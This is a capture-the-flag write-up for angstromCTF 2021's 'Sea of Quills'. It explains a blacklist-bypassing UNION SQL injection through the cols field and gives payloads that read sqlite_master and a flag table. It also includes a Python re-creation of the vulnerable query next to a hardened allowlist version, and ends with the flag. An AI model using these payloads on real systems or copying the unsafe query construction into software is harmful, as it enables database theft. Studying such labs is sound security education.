# Sea of Quills

## Description

Come check out our [finest selection of quills](https://seaofquills.2021.chall.actf.co/)!

[app.rb](app.rb)

## Solution

First of all, let's analyze the code. There are three interesting parts:

Some characters are blacklisted in the `cols` field:

```ruby
blacklist = ["-", "/", ";", "'", "\""]

blacklist.each { |word|
  if cols.include? word
    return "beep boop sqli detected!"
  end
}
```


The `lim` and `off` fields must be numeric:

```ruby
if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
  return "bad, no quills for you!"
end
```


Finally, the `cols` field is interpolated straight into the query string; it is never escaped or validated beyond the blacklist:

```ruby
@row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])
```


Given this information, the injection point is the `cols` field. Because `-`, `/` and `;` are blacklisted, we cannot comment out (`--`, `/*`) or terminate (`;`) the trailing `from quills limit ... offset ...`, so the payload has to end in a `UNION SELECT` that turns that leftover text into the second half of a valid query.

On the `/quills` page the `cols` field is not visible, but by inspecting and editing the HTML in the browser's developer tools we can remove the `hidden` attribute from the input and submit it ourselves:

![](img1.png)
![](img2.png)

Now we can start with the SQL injection, keeping `lim=100` and `off=0` so the numeric check passes and up to 100 rows come back.

First things first, we need to find where the flag is stored, and we can do that by listing the tables in the database. SQLite keeps its schema in `sqlite_master`, and the `UNION SELECT url` part consumes the original `from quills limit 100 offset 0` suffix while keeping both sides at one column:

```sql
name FROM sqlite_master UNION SELECT url
```


![](img3.png)

There is a table named `flagtable`, so let's read it with the same trick:

```sql
flag FROM flagtable UNION SELECT url
```


![](img4.png)
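To see why these two payloads pass the filter and what they return, here is an added example (not the challenge's `app.rb` and not part of the original writeup): a Python re-creation of the app's checks and of its unsafe query construction, run against a constructed in-memory SQLite database. The `quills` schema, the sample rows and the placeholder flag are assumptions; only the `url` column and the `flagtable` name come from the page. A hardened variant with an allowlist of column names is included beside it for contrast; it is my suggestion, not the challenge's fix.

```python
import re
import sqlite3

# Same blacklist as app.rb. It blocks the comment and statement separators
# (-, /, ;) but not the keywords needed for a UNION-based payload.
BLACKLIST = ["-", "/", ";", "'", "\""]

# Column names a caller is allowed to request in the hardened variant.
# Assumed set: the page only shows that a url column exists.
ALLOWED_COLS = {"name", "url"}


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge database (schema assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE quills (name TEXT, url TEXT);
        CREATE TABLE flagtable (flag TEXT);
        INSERT INTO quills VALUES ('Sparrow Quill', '/img/sparrow.png');
        INSERT INTO quills VALUES ('Eagle Quill', '/img/eagle.png');
        INSERT INTO flagtable VALUES ('actf{placeholder_not_the_real_flag}');
        """
    )
    return db


def quills_vulnerable(db, cols, lim, off):
    """Mirror of app.rb: blacklist check, numeric check, then string
    interpolation of cols into the SQL text. Returns the first column of
    each row, or the app's error message when a check fails."""
    if any(word in cols for word in BLACKLIST):
        return "beep boop sqli detected!"
    # app.rb uses /^[0-9]+$/; in Ruby ^ and $ are line anchors, so the
    # strict equivalent is \A[0-9]+\z. fullmatch is used here because the
    # writeup only needs lim and off to be plain digit strings.
    if not re.fullmatch(r"[0-9]+", lim) or not re.fullmatch(r"[0-9]+", off):
        return "bad, no quills for you!"
    # Same construction as app.rb: cols is spliced in unescaped, so a payload
    # such as "name FROM sqlite_master UNION SELECT url" becomes
    # "select name FROM sqlite_master UNION SELECT url from quills limit 100 offset 0".
    query = "select %s from quills limit %s offset %s" % (cols, lim, off)
    return [row[0] for row in db.execute(query)]


def quills_hardened(db, cols, lim, off):
    """Column names cannot be bound as query parameters, so the safe option
    is an allowlist of exact column names; lim and off are bound as ints."""
    if cols not in ALLOWED_COLS:
        return "bad column"
    if not re.fullmatch(r"[0-9]+", lim) or not re.fullmatch(r"[0-9]+", off):
        return "bad, no quills for you!"
    query = "select %s from quills limit ? offset ?" % cols
    return [row[0] for row in db.execute(query, (int(lim), int(off)))]


if __name__ == "__main__":
    db = build_db()
    # The two payloads from the writeup, plus one that the blacklist catches.
    for payload in (
        "name FROM sqlite_master UNION SELECT url",
        "flag FROM flagtable UNION SELECT url",
        "name FROM sqlite_master --",
    ):
        print(repr(payload), "->", quills_vulnerable(db, payload, "100", "0"))
    print("hardened ->", quills_hardened(db, "name FROM sqlite_master UNION SELECT url", "100", "0"))
```

Running it shows the first payload returning the table names `quills` and `flagtable` mixed with the quill URLs (the `UNION` deduplicates and merges both result sets), the second returning the placeholder flag next to the URLs, and the `--` variant being rejected by the blacklist. The hardened function rejects every injected string because it compares `cols` against whole allowed names rather than scanning for bad characters.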

#### **FLAG >>** actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}

Original writeup (https://github.com/K1nd4SUS/CTF-Writeups/tree/main/%C3%A5ngstromCTF_2021/Sea%20of%20Quills).